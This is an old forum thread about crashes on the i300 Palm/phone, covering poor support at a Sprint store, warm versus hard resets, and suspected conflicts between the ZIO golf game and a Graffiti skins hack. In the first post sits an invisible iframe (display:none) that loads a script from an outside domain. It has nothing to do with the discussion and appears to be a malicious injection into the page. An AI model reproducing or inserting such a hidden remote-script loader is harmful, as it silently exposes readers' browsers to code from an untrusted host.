I300 tech support

My unit froze and I couldn't get it to snap out of it without wiping out my memory. I took it over to the Sprint store and they totally did what I was trying to avoid. Dude across the counter handed me the phone thinking I was going to be happy now that it worked.
I'm beginning to realize that the technicians are trained to handle digital phone mechanics but the I300 is an intergrated Palm/phone device. More a PDA than a phone. Don't know if there's much they can do to help anyone. I'm just glad I back-up regurlarly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

as warm reset might have saved it.. and if you backed up to palm desktop 4.0.1, you would have lost voice/speed dial #'s but would have had everything else..

did you come to your friends here on the board first to see if we could figure out the issue?

the folks over at the sprint stores no nothing about these particular phones... just the basics... "if it does not work as its supposed to , just cold reset.." thats all they know... not many of them know how to trouble shoot...

marc,
I always come here first and foremost. A lot of valuable info on this board but most of the crashes were of different reasons. Beleive it or not, it's the ZIO golf game that did it for me. Even when everything was restored, it did it again.
It's wierd, what can I say?
It was working fine for like a month before. My post is to let people know about the level of support to expect with the I300.

i dont think zio golk is the only culprit here.. i use it everyday to practice so i can play against tiger some day... and i have not had issues with it...

it must have been the result of other apps in combination..

Zio Golf & Crashing

I can't blame Zio Golf, because it worked great for a very long while... unil I tried the latest version of Jake's Graffiti Skins hack.

The first time I played golf after I installed the hack (with the skins running), the sysem hung, so I rebooted, whereupon the OS got caught in this loop where the splash screen came up and then it rebooted again over and over. The only way to interrupt it was to hold the power button, which gave me the Hard Reset prompt.

Got the phone back, but lost everything else. Of course this was on the outbound flight of a 7 day trip

I don't know for sure if it's a compatibility issue between Zio and the Graffiti hack for sure, but I'll be trying them together for some more testing before I take another trip!
